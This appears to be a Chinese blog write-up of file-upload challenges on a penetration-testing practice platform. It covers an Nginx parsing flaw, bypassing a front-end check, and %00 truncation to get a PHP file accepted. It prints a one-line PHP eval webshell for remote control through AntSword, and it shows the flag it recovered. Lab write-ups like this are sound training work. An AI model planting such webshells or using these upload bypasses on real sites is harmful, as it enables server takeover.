安鸾文件上传

最新推荐文章于 2022-09-30 21:45:02 发布
最新推荐文章于 2022-09-30 21:45:02 发布
阅读量664 收藏
点赞数
分类专栏: 安鸾渗透实战平台 文章标签: mongodb 数据库 oracle
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MCTSOG/article/details/123264951
版权

文件上传

安鸾渗透实战平台-Nginx解析漏洞

Nginx解析漏洞原理及复现

制作一图片马,然后上传,然后用蚁剑连接

http://www.whalwl.site:8020/uploadfiles/025108c5577eacf12c2e26e14dcc8a71.jpg/a.php(已失效)

查找flag

安鸾渗透实战平台-文件上传01

这就是个属于文件上传的前端验证,绕过前端即可

(可以删除网页源码中的检测内容,或者关闭浏览器的js功能)

然后上传,然后用蚁剑连接,查找flag

安鸾渗透实战平台-文件上传02

要求上传图片

尝试:

1 上传web.jpg 图片马

<?php @eval($_POST['shell']); ?>

上传成功,发现上传后的路径如下:

http://whalwl.site:8025/images/9020220115115158.jpg

发现1:对上传的让图片文件,进行了重命名!

2 直接上传web.jpg 抓包该包 为web.php 放包, 使用burpsuite repeater 模拟 的response如下

HTTP/1.1 200 OK

Date: Sat, 15 Jan 2022 12:01:23 GMT

Server: Apache/2.2.22 (EL)

X-Powered -By: PHP/5.2.17

Content-Length: 549

Connection: close

Content-Type: text/html;charset=utf-8

<ol><h1>别玩游戏了,好好做题吧!</h1>

<br>  <br><form enctype="multipart/form-data" method="post">

                <p>请选择要上传的图片:<p><input type="hidden" name="file_path" value="images/"/><input class="input_file" type="file" name="upload_file"/><input class="button" type="submit" name="submit" value="上传"/></form>

            <div id="img"></div>

  </ol>

</div>

网页没有反映,既不提示上传信息有误,也不进行提示 --没有头脑

response也就是网页html文件

3 尝试上传 一个 文本文upload7.txt 和 2一样 网页没响应 基本猜测应该是有白名单 +文件重命名

Get%00截断

POST%00截断

抓包发现 似乎上传文件路径可控,尝试使用post%00截断

http://whalwl.site:8025/images/upload02.php2120220115122910.jpg

忘记了,post的需要在16进制先改,在p(70)后面的额改为00即可
请添加图片描述

本来以为没成功,后面就试了一下发现,有phpinfo()的回显搞出来了
请添加图片描述

根据提示在服务器根目录下找到flag文件

请添加图片描述

flag{c325cb3922a0e48c}

IsecNoob
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网站渗透实战篇.全面解析漏洞(20节课)
10-15
网站渗透实战篇.全面解析漏洞,内富解压密码,请看说明
java反序列化漏洞工具AllInOne
01-05
java反序列化漏洞检测工具集 支持 jboss weblogic Websphere 本工具仅为方便管理员发现和展示漏洞的危害性,请勿用于非法用途
安鸾文件上传系列
柠鹿的轨迹
08-28 652
0x00 Nginx解析漏洞 0o00 题目提示 0o01 上传流程 0o02 Nginx解析漏洞 0x00 文件上传01 0o00 题目提示 0o01 上传流程 0x00 文件上传02 0o00 题目提示 0o01 上传流程
安鸾渗透实战平台---文件上传01
weixin_50985113的博客
05-15 1064
安鸾渗透实战平台——文件上传01 1、访问 2、找到上传点,全部都试了,就这里可以上传 3、准备木马,并把后缀改成.jpg,因为上传php时提示jpg,所以他应该做了过滤 4、我猜他是前端过滤,我这里抓个包,从数据包中把他的后缀改回来 找到目标 bp监听,浏览器点击上传 改成php 上传成功,这里我们发现了一个黑点,我们试试访问他的地址 找到了上传路径 由于是.php所以直接上蚁剑 连接成功 找到flag.txt 去看看,即可得到flag ...
安鸾平台 文件上传
WEB渗透测试 从入门到萌新
09-30 351
文件上传
安鸾平台文件上传漏洞
你的网线学长吖
03-17 7350
1.Nginx解析漏洞 由于判断文件后缀出现问题,导致可以添加一个/.php后缀,使得系统解析图片木马为php文件 解题: 1:首先正常上传一个含php代码的木马图片 php代码注入:记得这个pass 后面是连接蚁剑的连接密码 2:上传后给出一个图片地址 3:将其进行访问 106.15.50.112:8020/uploadfiles/d0096ec6c83575373e3a21d129ff8fef.jpg/.php 注意后面加了/.php将其变为php文件 4.复制该地址,连接蚁剑找到flag
文件上传漏洞? 看这一篇就够了-Nginx解析漏洞 修改后缀绕过前端验证 00%截断 安鸾靶场练习
AAAAAAAAAAAA66的博客
12-31 4649
靶场地址 首页 : 安鸾渗透实战平台 - 安鸾学院 目录 文件上传漏洞利用条件 Nginx解析漏洞 文件上传01 (绕过前端验证) 文件上传02 00%截断​ 文件上传漏洞利用条件 1.可以上传php文件,或者上传的文件可以被解析为php文件 2.可以找的到文件上传后的路径 Nginx解析漏洞 该漏洞与Nginx、php版本无关,属于用户配置不当造成的解析漏洞。 实际上就是由于判断文件后缀出现问题,导致我们可以添加一个/.php 后缀 使得系统解析图片木马为php文..
2019 CTF题目下载及write up(难度较大)-b64_c3VuJTIwYm95-it720.docx
11-29
- 用JPEXS反编译SWF文件是Flash编程和安全挑战中的常见步骤,这允许参赛者查看和修改嵌入的资源,这里发现了441张黑白图片和一个MP3文件。 - 图片数据可能通过二进制处理(将黑白像素转换为0和1)形成新的数据,...
CISP-PTE-005-Web安全基础1 - HTTP协议.pptx
03-10
CISP-PTE CISP-PTE-005-Web安全基础1 - HTTP协议.pptx
xsser.7z漏洞练习靶场
01-03
**XSSer 7z 漏洞练习靶场** XSS(Cross-Site Scripting,跨站脚本攻击)是一种常见的网络安全漏洞,它允许攻击者在用户浏览器中注入恶意脚本,从而控制用户的交互行为或者窃取敏感信息。这个"Xsser.7z漏洞练习靶场...
真实渗透改编--综合渗透 sql注入写马+文件上传+udf提权 安鸾靶场SQL注入学习
AAAAAAAAAAAA66的博客
02-16 4800
从去年12月末到现在2月中,也算是把这个靶场的大多数题目刷了一遍,自己也能算的上一个初学者把,本文具体的教程在b站上有(建立靶场的师傅),而本文记录自己的解题和思考过程。如果之前没有接触到这些知识点的同学,可能会感觉到比较吃力,这是正常的。 哈兹本得的个人空间_哔哩哔哩_Bilibili 题目URL http://106.15.50.112:8023/ 目录 解题过程 sql注入写马 ​ 提权 准备udf文件(提权文件) 实施 解题过程 sql注入写马 寻找注入点 寻找网站真实.
【渗透测试-web安全】DVWA-文件上传
harry_c的博客
11-13 539
【渗透测试-web安全】DVWA-文件上传实操进阶 实操 服务器使用upload(“hello.jpg”),实现文件上传。而我们则是利用hello.jpg的参数构造进行漏洞攻击 首先登录系统,选择Low等级进行实战 上传文件: 显示:…/…/hackable/uploads/崽崽.jpg succesfully uploaded! 由http://localhost/dvwa/vulnerabi...
安鸾渗透实战平台|SQL数字型注入详细教程
qq_67262179的博客
05-06 1445
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录@[TOC](文章目录) 安鸾渗透实战平台|SQL数字型注入详细教程前言一、Mysql默认的information库基本1.schemata表内容2.tables表内容3.columns表内容二、渗透靶场地址三、mysql渗透步骤1.进入靶场,查看页面基本信息2.判断是否存在注入3.判断是否存在 符号过滤4.判断数据库字段列名数量5.使用联合查询判断显位点6.基本信息收集7.查询指定数据(cms)库下所有的表名8.查询指定表明下的.
安鸾渗透实战平台(文件上传)—— Nginx解析漏洞 (100分)
weixin_50985113的博客
06-28 1884
安鸾渗透实战平台 图片、一句话木马 中国蚁剑(webshell管理工具) 冻手 1、准备好图片马(截取一个图片,编辑加入一个一句话木马) 2、上传 3、从回显的文件路径中截取后面字段 4、访问(最开始显示买豆子的图片,我还以为图片没了=.=)5、url后面加上/.php(在的,在的) 6、上蚁剑 7、找flag 1、升级nginx 2、修改/etc/php.ini文件,将cgi.fix_pathinfo的值设为0:...
安鸾渗透实战平台wp(持续更新)
Delity的博客
05-13 6820
一、SQL注入 SQL数字型GET注入01 漏洞URL:http://www.whalwl.top:8001/bug/sql_injection/sql_num.php 1’报错,输入-1返回正常,构造payload, 判断字段:显示位在第二位和第三位 -1 order by 3 # 爆库: -1 union select 1,database(),3 # 爆表: -1 union select 1,group_concat(table_name),3 from information_sch
安鸾渗透实战平台-sql注入篇
weixin_48421613的博客
01-04 3230
sql注入篇 安鸾渗透实战平台是一个在线的靶场平台,需要通过一些列手段找到flag提交 文章目录sql注入篇SQL字符型注入(1-2)一、需识别mysql默认的information库二、内部结构1.schemata表内容2.tables表内容3.columns表内容4.解题思路SQL搜索型注入总结 SQL字符型注入(1-2) 开始忘记截图了,只好给大家直接写一下payload了 提示:仅适合参考 一、需识别mysql默认的information库 mysql 5.0版本以上会有一个默认的infor
Webservice之应用协议SOAP
心火燃烧!
11-08 597
什么是SOAP? SOAP 是一种简单的基于 XML 的协议,它使应用程序通过 HTTP 来交换信息。或者更简单地说:SOAP 是用于访问网络服务的协议。 SOAP 指简易对象访问协议 SOAP 是一种通信协议 SOAP 用于应用程序之间的通信 SOAP 是一种用于发送消息的格式 SOAP 被设计用来通过因特网进行通信 SOAP 独立于平台 SOAP 独立于语言 SOAP 基于 XML SOAP...
安鸾sql宽字符02
最新发布
07-28
抱歉,我无法回答关于安鸾SQL宽字符02的问题。 #### 引用[.reference_title] - *1* [安鸾SQL系列之数字字符串](https://blog.csdn.net/weixin_46318141/article/details/123917863)[target="_blank" data-report-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值